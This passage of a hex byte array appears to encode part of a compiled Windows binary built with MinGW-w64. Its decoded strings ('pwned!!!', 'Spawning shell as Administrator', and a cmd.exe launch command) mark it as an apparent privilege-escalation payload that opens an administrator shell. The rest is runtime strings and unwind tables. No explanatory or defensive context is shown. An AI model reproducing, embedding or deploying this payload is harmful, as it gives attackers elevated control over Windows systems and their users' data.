,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x70 ,0x77 ,0x6e ,0x65 ,0x64 ,0x21 ,0x21 ,0x21 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x53 ,0x70 ,0x61 ,0x77 ,0x6e ,0x6e ,0x69 ,0x6e ,0x67 ,0x20 ,0x73 ,0x68 ,0x65 ,0x6c ,0x6c ,0x20 ,0x61 ,0x73 ,0x20 ,0x41 ,0x64 ,0x6d ,0x69 ,0x6e ,0x69 ,0x73 ,0x74 ,0x72 ,0x61 ,0x74 ,0x6f ,0x72 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x63 ,0x6d ,0x64 ,0x2e ,0x65 ,0x78 ,0x65 ,0x20 ,0x2f ,0x6b ,0x20 ,0x43 ,0x3a ,0x5c ,0x77 ,0x69 ,0x6e ,0x64 ,0x6f ,0x77 ,0x73 ,0x5c ,0x73 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x33 ,0x32 ,0x5c ,0x63 ,0x6d ,0x64 ,0x2e ,0x65 ,0x78 ,0x65 ,0x00 ,0x00 ,0x20 ,0x75 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x70 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x17 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0xb0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0xcc ,0x75 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0xa0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x4d ,0x69 ,0x6e ,0x67 ,0x77 ,0x2d ,0x77 ,0x36 ,0x34 ,0x20 ,0x72 ,0x75 ,0x6e ,0x74 ,0x69 ,0x6d ,0x65 ,0x20 ,0x66 ,0x61 ,0x69 ,0x6c ,0x75 ,0x72 ,0x65 ,0x3a ,0x0a ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x41 ,0x64 ,0x64 ,0x72 ,0x65 ,0x73 ,0x73 ,0x20 ,0x25 ,0x70 ,0x20 ,0x68 ,0x61 ,0x73 ,0x20 ,0x6e ,0x6f ,0x20 ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x2d ,0x73 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x20 ,0x20 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x51 ,0x75 ,0x65 ,0x72 ,0x79 ,0x20 ,0x66 ,0x61 ,0x69 ,0x6c ,0x65 ,0x64 ,0x20 ,0x66 ,0x6f ,0x72 ,0x20 ,0x25 ,0x64 ,0x20 ,0x62 ,0x79 ,0x74 ,0x65 ,0x73 ,0x20 ,0x61 ,0x74 ,0x20 ,0x61 ,0x64 ,0x64 ,0x72 ,0x65 ,0x73 ,0x73 ,0x20 ,0x25 ,0x70 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x20 ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x50 ,0x72 ,0x6f ,0x74 ,0x65 ,0x63 ,0x74 ,0x20 ,0x66 ,0x61 ,0x69 ,0x6c ,0x65 ,0x64 ,0x20 ,0x77 ,0x69 ,0x74 ,0x68 ,0x20 ,0x63 ,0x6f ,0x64 ,0x65 ,0x20 ,0x30 ,0x78 ,0x25 ,0x78 ,0x00 ,0x00 ,0x20 ,0x20 ,0x55 ,0x6e ,0x6b ,0x6e ,0x6f ,0x77 ,0x6e ,0x20 ,0x70 ,0x73 ,0x65 ,0x75 ,0x64 ,0x6f ,0x20 ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x61 ,0x74 ,0x69 ,0x6f ,0x6e ,0x20 ,0x70 ,0x72 ,0x6f ,0x74 ,0x6f ,0x63 ,0x6f ,0x6c ,0x20 ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x20 ,0x25 ,0x64 ,0x2e ,0x0a ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x20 ,0x55 ,0x6e ,0x6b ,0x6e ,0x6f ,0x77 ,0x6e ,0x20 ,0x70 ,0x73 ,0x65 ,0x75 ,0x64 ,0x6f ,0x20 ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x61 ,0x74 ,0x69 ,0x6f ,0x6e ,0x20 ,0x62 ,0x69 ,0x74 ,0x20 ,0x73 ,0x69 ,0x7a ,0x65 ,0x20 ,0x25 ,0x64 ,0x2e ,0x0a ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x30 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x2a ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x43 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x43 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x80 ,0x40 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x30 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x18 ,0x79 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x79 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0xa0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0xa0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0xa0 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x75 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x47 ,0x43 ,0x43 ,0x3a ,0x20 ,0x28 ,0x78 ,0x38 ,0x36 ,0x5f ,0x36 ,0x34 ,0x2d ,0x70 ,0x6f ,0x73 ,0x69 ,0x78 ,0x2d ,0x73 ,0x65 ,0x68 ,0x2d ,0x72 ,0x65 ,0x76 ,0x30 ,0x2c ,0x20 ,0x42 ,0x75 ,0x69 ,0x6c ,0x74 ,0x20 ,0x62 ,0x79 ,0x20 ,0x4d ,0x69 ,0x6e ,0x47 ,0x57 ,0x2d ,0x57 ,0x36 ,0x34 ,0x20 ,0x70 ,0x72 ,0x6f ,0x6a ,0x65 ,0x63 ,0x74 ,0x29 ,0x20 ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x0c ,0x10 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x10 ,0x10 ,0x00 ,0x00 ,0xff ,0x11 ,0x00 ,0x00 ,0x04 ,0x60 ,0x00 ,0x00 ,0x00 ,0x12 ,0x00 ,0x00 ,0x2b ,0x13 ,0x00 ,0x00 ,0x18 ,0x60 ,0x00 ,0x00 ,0x30 ,0x13 ,0x00 ,0x00 ,0x7f ,0x13 ,0x00 ,0x00 ,0x28 ,0x60 ,0x00 ,0x00 ,0x80 ,0x13 ,0x00 ,0x00 ,0x8f ,0x13 ,0x00 ,0x00 ,0x30 ,0x60 ,0x00 ,0x00 ,0x90 ,0x13 ,0x00 ,0x00 ,0x9c ,0x13 ,0x00 ,0x00 ,0x34 ,0x60 ,0x00 ,0x00 ,0xa0 ,0x13 ,0x00 ,0x00 ,0xa1 ,0x13 ,0x00 ,0x00 ,0x38 ,0x60 ,0x00 ,0x00 ,0xb0 ,0x13 ,0x00 ,0x00 ,0xfa ,0x13 ,0x00 ,0x00 ,0x3c ,0x60 ,0x00 ,0x00 ,0xfa ,0x13 ,0x00 ,0x00 ,0x23 ,0x14 ,0x00 ,0x00 ,0x48 ,0x60 ,0x00 ,0x00 ,0x30 ,0x14 ,0x00 ,0x00 ,0x65 ,0x14 ,0x00 ,0x00 ,0x54 ,0x60 ,0x00 ,0x00 ,0x70 ,0x14 ,0x00 ,0x00 ,0xd6 ,0x14 ,0x00 ,0x00 ,0x5c ,0x60 ,0x00 ,0x00 ,0xe0 ,0x14 ,0x00 ,0x00 ,0xff ,0x14 ,0x00 ,0x00 ,0x68 ,0x60 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x00 ,0xd6 ,0x15 ,0x00 ,0x00 ,0x6c ,0x60 ,0x00 ,0x00 ,0xe0 ,0x15 ,0x00 ,0x00 ,0xd8 ,0x16 ,0x00 ,0x00 ,0x7c ,0x60 ,0x00 ,0x00 ,0xe0 ,0x16 ,0x00 ,0x00 ,0x0f ,0x17 ,0x00 ,0x00 ,0x8c ,0x60 ,0x00 ,0x00 ,0x10 ,0x17 ,0x00 ,0x00 ,0x83 ,0x17 ,0x00 ,0x00 ,0x94 ,0x60 ,0x00 ,0x00 ,0x90 ,0x17 ,0x00 ,0x00 ,0x93 ,0x17 ,0x00 ,0x00 ,0xa0 ,0x60 ,0x00 ,0x00 ,0xa0 ,0x17 ,0x00 ,0x00 ,0xa4 ,0x17 ,0x00 ,0x00 ,0xa4 ,0x60 ,0x00 ,0x00 ,0xb0 ,0x17 ,0x00 ,0x00 ,0xb4 ,0x17 ,0x00 ,0x00 ,0xa8 ,0x60 ,0x00 ,0x00 ,0xc0 ,0x17 ,0x00 ,0x00 ,0x8d ,0x19 ,0x00 ,0x00 ,0xb8 ,0x60 ,0x00 ,0x00 ,0x90 ,0x19 ,0x00 ,0x00 ,0x4b ,0x1c ,0x00 ,0x00 ,0xc8 ,0x60 ,0x00 ,0x00 ,0x50 ,0x1c ,0x00 ,0x00 ,0xf0 ,0x1d ,0x00 ,0x00 ,0xe0 ,0x60 ,0x00 ,0x00 ,0xf0 ,0x1d ,0x00 ,0x00 ,0xdc ,0x1e ,0x00 ,0x00 ,0xe8 ,0x60 ,0x00 ,0x00 ,0xe0 ,0x1e ,0x00 ,0x00 ,0xc7 ,0x20 ,0x00 ,0x00 ,0xf8 ,0x60 ,0x00 ,0x00 ,0xd0 ,0x20 ,0x00 ,0x00 ,0x3a ,0x21 ,0x00 ,0x00 ,0x00 ,0x61 ,0x00 ,0x00 ,0x40 ,0x21 ,0x00 ,0x00 ,0xbf ,0x21 ,0x00 ,0x00 ,0x10 ,0x61 ,0x00 ,0x00 ,0xc0 ,0x21 ,0x00 ,0x00 ,0x60 ,0x22 ,0x00 ,0x00 ,0x20 ,0x61 ,0x00 ,0x00 ,0x60 ,0x22 ,0x00 ,0x00 ,0x3a ,0x23 ,0x00 ,0x00 ,0x28 ,0x61 ,0x00 ,0x00 ,0x40 ,0x23 ,0x00 ,0x00 ,0x5e ,0x23 ,0x00 ,0x00 ,0x30 ,0x61 ,0x00 ,0x00 ,0x60 ,0x23 ,0x00 ,0x00 ,0x72 ,0x23 ,0x00 ,0x00 ,0x34 ,0x61 ,0x00 ,0x00 ,0x80 ,0x23 ,0x00 ,0x00 ,0xc4 ,0x23 ,0x00 ,0x00 ,0x38 ,0x61 ,0x00 ,0x00 ,0xd0 ,0x23 ,0x00 ,0x00 ,0x5d ,0x24 ,0x00 ,0x00 ,0x3c ,0x61 ,0x00 ,0x00 ,0x60 ,0x24 ,0x00 ,0x00 ,0xd4 ,0x24 ,0x00 ,0x00 ,0x48 ,0x61 ,0x00 ,0x00 ,0xe0 ,0x24 ,0x00 ,0x00 ,0x1e ,0x25 ,0x00 ,0x00 ,0x50 ,0x61 ,0x00 ,0x00 ,0x20 ,0x25 ,0x00 ,0x00 ,0x8f ,0x25 ,0x00 ,0x00 ,0x58 ,0x61 ,0x00 ,0x00 ,0x90 ,0x25 ,0x00 ,0x00 ,0xc7 ,0x25 ,0x00 ,0x00 ,0x60 ,0x61 ,0x00 ,0x00 ,0xd0 ,0x25 ,0x00 ,0x00 ,0x61 ,0x26 ,0x00 ,0x00 ,0x68 ,0x61 ,0x00 ,0x00 ,0x70 ,0x26 ,0x00 ,0x00 ,0x16 ,0x27 ,0x00 ,0x00 ,0x70 ,0x61 ,0x00 ,0x00 ,0x20 ,0x27 ,0x00 ,0x00 ,0x23 ,0x27 ,0x00 ,0x00 ,0x78 ,0x61 ,0x00 ,0x00 ,0x70 ,0x27 ,0x00 ,0x00 ,0x76 ,0x27 ,0x00 ,0x00 ,0x7c ,0x61 ,0x00 ,0x00 ,0xd0 ,0x27 ,0x00 ,0x00 ,0xf5 ,0x27 ,0x00 ,0x00 ,0x80 ,0x61 ,0x00 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0xc8 ,0x28 ,0x00 ,0x00 ,0x84 ,0x61 ,0x00 ,0x00 ,0xd0 ,0x28 ,0x00 ,0x00 ,0x3f ,0x29 ,0x00 ,0x00 ,0x94 ,0x61 ,0x00 ,0x00 ,0x40 ,0x29 ,0x00 ,0x00 ,0x5f ,0x29 ,0x00 ,0x00 ,0xa0 ,0x61 ,0x00 ,0x00 ,0x50 ,0x2a ,0x00 ,0x00 ,0xb9 ,0x2a ,0x00 ,0x00 ,0xac ,0x60 ,0x00 ,0x00 ,0xc0 ,0x2a ,0x00 ,0x00 ,0xc5 ,0x2a ,0x00 ,0x00 ,0xa8 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x0c ,0x07 ,0x00 ,0x0c ,0x42 ,0x08 ,0x30 ,0x07 ,0x60 ,0x06 ,0x70 ,0x05 ,0x50 ,0x04 ,0xc0 ,0x02 ,0xd0 ,0x00 ,0x00 ,0x01 ,0x0a ,0x06 ,0x00 ,0x0a ,0x32 ,0x06 ,0x30 ,0x05 ,0x60 ,0x04 ,0x70 ,0x03 ,0x50 ,0x02 ,0xc0 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x82 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x08 ,0x03 ,0x05 ,0x08 ,0x32 ,0x04 ,0x03 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x08 ,0x03 ,0x05 ,0x08 ,0x32 ,0x04 ,0x03 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x06 ,0x03 ,0x00 ,0x06 ,0x42 ,0x02 ,0x30 ,0x01 ,0x60 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x0a ,0x06 ,0x00 ,0x0a ,0x52 ,0x06 ,0x30 ,0x05 ,0x60 ,0x04 ,0x70 ,0x03 ,0x50 ,0x02 ,0xc0 ,0x01 ,0x0a ,0x05 ,0x05 ,0x0a ,0xd2 ,0x06 ,0x03 ,0x03 ,0x30 ,0x02 ,0x60 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x06 ,0x03 ,0x00 ,0x06 ,0x42 ,0x02 ,0x30 ,0x01 ,0x60 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x06 ,0x03 ,0x00 ,0x06 ,0x62 ,0x02 ,0x30 ,0x01 ,0x60 ,0x00 ,0x00 ,0x01 ,0x0a ,0x06 ,0x00 ,0x0a ,0x92 ,0x06 ,0x30 ,0x05 ,0x60 ,0x04 ,0x70 ,0x03 ,0x50 ,0x02 ,0xc0 ,0x01 ,0x18 ,0x0a ,0x85 ,0x18 ,0x03 ,0x10 ,0x62 ,0x0c ,0x30 ,0x0b ,0x60 ,0x0a ,0x70 ,0x09 ,0xc0 ,0x07 ,0xd0 ,0x05 ,0xe0 ,0x03 ,0xf0 ,0x01 ,0x50 ,0x01 ,0x04 ,0x01 ,0x00 ,0x04 ,0x42 ,0x00 ,0x00 ,0x01 ,0x0a ,0x06 ,0x00 ,0x0a ,0x32 ,0x06 ,0x30 ,0x05 ,0x60 ,0x04 ,0x70 ,0x03 ,0x50 ,0x02 ,0xc0 ,0x01 ,0x05 ,0x02 ,0x00 ,0x05 ,0x32 ,0x01 ,0x30 ,0x01 ,0x08 ,0x05 ,0x00 ,0x08 ,0x42 ,0x04 ,0x30 ,0x03 ,0x60 ,0x02 ,0x70 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x08 ,0x05 ,0x00 ,0x08 ,0x42 ,0x04 ,0x30 ,0x03 ,0x60 ,0x02 ,0x70 ,0x01 ,0x50 ,0x00 ,0x00 ,0x01 ,0x05 ,0x02 ,0x00 ,0x05 ,0x32 ,0x01 ,0x30 ,0x01 ,0x05 ,0x02 ,0x00 ,0x05 ,0x32 ,0x01 ,0x30 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 